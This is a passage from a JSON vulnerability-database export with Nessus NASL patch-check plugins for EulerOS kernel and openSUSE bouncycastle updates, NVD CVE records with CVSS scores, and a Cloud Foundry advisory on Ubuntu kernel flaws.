On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system.(CVE-2014-7822)\n\n - The vc4_get_bcl function in\n drivers/gpu/drm/vc4/vc4_gem.c in the VideoCore DRM\n driver in the Linux kernel before 4.9.7 does not set an\n errno value upon certain overflow detections allowing\n local users to cause a denial of service (incorrect\n pointer dereference and OOPS) via inconsistent size\n values in a VC4_SUBMIT_CL ioctl call.(CVE-2017-5577)\n\n - In fs/ocfs2/cluster/nodemanager.c in the Linux kernel\n before 4.15, local users can cause a denial of service\n (NULL pointer dereference and BUG) because a required\n mutex is not used.(CVE-2017-18216)\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the\n system.(CVE-2016-8655)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). 
The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862)\n\n - arch/arm64/ include /asm/pgtable.h in the Linux kernel\n before 3.15-rc5-next-20140519, as used in Android\n before 2016-07-05 on Nexus 5X and 6P devices,\n mishandles execute-only pages, which allows attackers\n to gain privileges via a crafted application, aka\n Android internal bug 28557020.(CVE-2014-9803)\n\n - A heap-buffer overflow vulnerability was found in the\n arcmsr_iop_message_xfer() function in\n 'drivers/scsi/arcmsr/arcmsr_hba.c' file in the Linux\n kernel through 4.8.2. The function does not restrict a\n certain length field, which allows local users to gain\n privileges or cause a denial of service via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control code. This can\n potentially cause kernel heap corruption and arbitrary\n kernel code execution.(CVE-2016-7425)\n\n - An issue was discovered in the Linux kernel before\n 4.18.11. 
The ipddp_ioctl function in\n drivers/net/appletalk/ipddp.c allows local users to\n obtain sensitive kernel address information by\n leveraging CAP_NET_ADMIN to read the ipddp_route dev\n and next fields via an SIOCFINDIPDDPRT ioctl\n call.(CVE-2018-20511)\n\n - A memory leak in the irda_bind function in\n net/irda/af_irda.c in the Linux kernel, through 4.16,\n allows local users to cause a denial of service due to\n a memory consumption by repeatedly binding an AF_IRDA\n socket.(CVE-2018-6554)\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n employs a locking approach that does not consider slave\n timer instances, which allows local users to cause a\n denial of service (race condition, use-after-free, and\n system crash) via a crafted ioctl\n call.(CVE-2016-2547)\n\n - Buffer overflow in the complete_emulated_mmio function\n in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6\n allows guest OS users to execute arbitrary code on the\n host OS by leveraging a loop that triggers an invalid\n memory copy affecting certain cancel_work_item\n data.(CVE-2014-0049)\n\n - An issue was discovered in the F2FS filesystem code in\n the Linux kernel in fs/f2fs/inode.c. A denial of\n service due to a slab out-of-bounds read can occur for\n a crafted f2fs filesystem image in which FI_EXTRA_ATTR\n is set in an inode.(CVE-2018-13098)\n\n - A vulnerability was found in the Linux kernel where\n having malicious IP options present would cause the\n ipv4_pktinfo_prepare() function to drop/free the dst.\n This could result in a system crash or possible\n privilege escalation.(CVE-2017-5970)\n\n - In the Linux kernel's vmw_gb_surface_define_ioctl()\n function, in 'drivers/gpu/drm/vmwgfx/vmwgfx_surface.c'\n file, a 'req->mip_levels' is a user-controlled value\n which is later used as a loop count limit. 
This allows\n local unprivileged user to cause a denial of service by\n a kernel lockup via a crafted ioctl call for a\n '/dev/dri/renderD*' device.(CVE-2017-7346)\n\n - It was found that the NFSv4 server in the Linux kernel\n did not properly validate layout type when processing\n NFSv4 pNFS LAYOUTGET and GETDEVICEINFO operands. A\n remote attacker could use this flaw to soft-lockup the\n system and thus cause denial of\n service.(CVE-2017-8797)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1482\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e3610568\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:51:50", "description": "This update for bouncycastle fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1000613: Fix use of Externally-Controlled 
Input\n to Select Classes or Code ('Unsafe Reflection')\n (boo#1100694).\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "openSUSE Security Update : bouncycastle (openSUSE-2019-546)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000613", "CVE-2017-13098"], "modified": "2019-03-27T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc"], "id": "OPENSUSE-2019-546.NASL", "href": "https://www.tenable.com/plugins/nessus/123233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-546.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123233);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13098\", \"CVE-2018-1000613\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2019-546)\");\n script_summary(english:\"Check for the openSUSE-2019-546 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bouncycastle fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1000613: Fix use of Externally-Controlled Input\n to Select Classes or Code ('Unsafe Reflection')\n (boo#1100694).\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1072697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100694\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"bouncycastle-1.60-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"bouncycastle-javadoc-1.60-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, 
"impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": 
{"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T07:12:50", "description": "The user password via the registration form of TronLink Wallet 2.2.0 is stored in the log when the class CreateWalletTwoActivity is called. Other authenticated users can read it in the log later. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-07-22T16:15:00", "title": "CVE-2019-13098", "type": "cve", "cwe": ["CWE-532"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13098"], "modified": "2019-07-24T15:03:00", "cpe": ["cpe:/a:tronlink:wallet:2.2.0"], "id": "CVE-2019-13098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13098", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:tronlink:wallet:2.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:32", 
"description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "cloudfoundry": [{"lastseen": "2019-10-01T00:30:26", "bulletinFamily": "software", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", 
"CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "description": "# \n\n## Severity\n\nMedium\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 16.04\n\n## Description\n\nIt was discovered that the alarmtimer implementation in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly track inode validations. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious f2fs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616, CVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious btrfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux kernel did not properly handle malformed catalog data in some situations. An attacker could use this to construct a malicious HFS+ image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem of the Linux kernel did not properly initialize new files in some situations. A local attacker could use this to expose sensitive information. 
(CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux kernel did not properly handle size checks when handling an extra USB descriptor. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in the Linux kernel did not properly validate elliptic curve parameters during Diffie-Hellman key exchange in some situations. An attacker could use this to expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors incorrectly handle SWAPGS instructions during speculative execution. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in the Near-field communication (NFC) implementation in the Linux kernel. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel improperly dropped a device reference in an error condition, leading to a use-after-free. 
An attacker could use this to cause a denial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in the Near-field communication (NFC) implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel when accessing LDT entries in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did not properly record credentials in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver implementation in the Linux kernel contained a use-after-free vulnerability when disconnecting the device. An attacker could use this to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the Linux kernel did not properly validate control bits, resulting in an out of bounds buffer read. A local attacker could use this to possibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux kernel did not properly prevent kernel addresses from being copied to user space. A local attacker with the CAP_NET_ADMIN capability could use this to expose sensitive information. 
(CVE-2018-20511)\n\nCVEs contained in this USN include: CVE-2018-13053, CVE-2018-13096, CVE-2018-14609, CVE-2018-14617, CVE-2018-16862, CVE-2018-20169, CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14614, CVE-2018-14616, CVE-2018-13093, CVE-2018-13098, CVE-2018-14615, CVE-2018-20511, CVE-2018-5383, CVE-2019-10126, CVE-2019-1125, CVE-2019-12614, CVE-2019-3846, CVE-2019-13272, CVE-2018-20856, CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, CVE-2019-13233, CVE-2019-2024, CVE-2019-2101\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 456.x versions prior to 456.14\n * 315.x versions prior to 315.83\n * 250.x versions prior to 250.95\n * 170.x versions prior to 170.120\n * 97.x versions prior to 97.145\n * All other stemcells not listed.\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 456.x versions to 456.14\n * Upgrade 315.x versions to 315.83\n * Upgrade 250.x versions to 250.95\n * Upgrade 170.x versions to 170.120\n * Upgrade 97.x versions to 97.145\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n\n## References\n\n * [USN-4094-1](<https://usn.ubuntu.com/4094-1>)\n * [CVE-2018-13053](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13053>)\n * [CVE-2018-13096](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13096>)\n * [CVE-2018-14609](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14609>)\n * 